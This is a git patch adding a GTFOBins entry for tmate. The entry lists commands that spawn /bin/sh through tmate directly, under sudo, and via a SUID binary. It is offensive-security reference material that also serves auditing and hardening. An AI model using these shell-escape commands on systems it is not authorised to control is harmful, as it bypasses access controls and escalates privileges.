From 1da593f546c9a0b13b1db26390a416d9d63cd6c2 Mon Sep 17 00:00:00 2001 From: d4t4s3c Date: Thu, 25 Aug 2022 20:43:41 +0200 Subject: [PATCH] Add tmate Co-authored-by: Andrea Cardaci --- _gtfobins/tmate.md | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 _gtfobins/tmate.md diff --git a/_gtfobins/tmate.md b/_gtfobins/tmate.md new file mode 100644 index 0000000..78a793c --- /dev/null +++ b/_gtfobins/tmate.md @@ -0,0 +1,9 @@ +--- +functions: + shell: + - code: tmate -c /bin/sh + sudo: + - code: sudo tmate -c /bin/sh + suid-limited: + - code: ./tmate -c /bin/sh +---